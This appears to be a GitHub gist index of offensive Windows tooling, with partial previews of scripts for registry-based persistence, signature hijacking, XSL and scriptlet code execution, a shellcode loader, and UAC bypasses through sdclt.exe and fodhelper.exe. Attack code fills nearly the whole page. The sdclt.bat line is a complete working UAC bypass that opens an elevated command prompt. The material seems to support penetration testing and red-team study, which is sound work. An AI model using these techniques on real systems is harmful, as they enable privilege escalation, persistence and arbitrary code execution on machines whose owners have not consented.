View ImageFileExecutionOptions.ps1
<# | |
ImageFileExecutionOptions v1.0 | |
License: GPLv3 | |
Author: @netbiosX | |
#> | |
# Image File Execution Options Injection Persistence Technique | |
# https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/ | |
function Persist-Debugger |
View pentestlab-dll.inf
[version] | |
Signature=$chicago$ | |
AdvancedINF=2.5 | |
[DefaultInstall_SingleUser] | |
RegisterOCXs=RegisterOCXSection | |
[RegisterOCXSection] | |
C:\Users\test.PENTESTLAB\pentestlab.dll |
View DigitalSignature-Hijack.ps1
<# | |
DigitalSignatureHijack v1.0 | |
License: GPLv3 | |
Author: @netbiosX | |
#> | |
# Validate Digital Signature for PowerShell Scripts | |
function ValidateSignaturePS | |
{ | |
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData' |
View customers.xml
<?xml version="1.0"?> | |
<?xml-stylesheet type="text/xsl" href="script.xsl" ?> | |
<customers> | |
<customer> | |
<name>Microsoft</name> | |
</customer> | |
</customers> |
View Sdclt.ps1
<# | |
.SYNOPSIS | |
This script can bypass User Access Control (UAC) via sdclt.exe for Windows 10. | |
Author: @netbiosX | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None | |
It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass |
View sdclt.bat
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "C:\Windows\System32\cmd.exe" /f && START /W C:\Windows\System32\sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f |
View FodhelperUACBypass.ps1
<# | |
.SYNOPSIS | |
This script can bypass User Access Control (UAC) via fodhelper.exe | |
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts | |
an elevated command prompt. | |
.NOTES | |
Function : FodhelperUACBypass | |
File Name : FodhelperUACBypass.ps1 |
View Shellcode.cs
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
View pentestlab.sct
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="Pentest" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- Proof Of Concept - @netbiosX --> | |
<script language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe"); |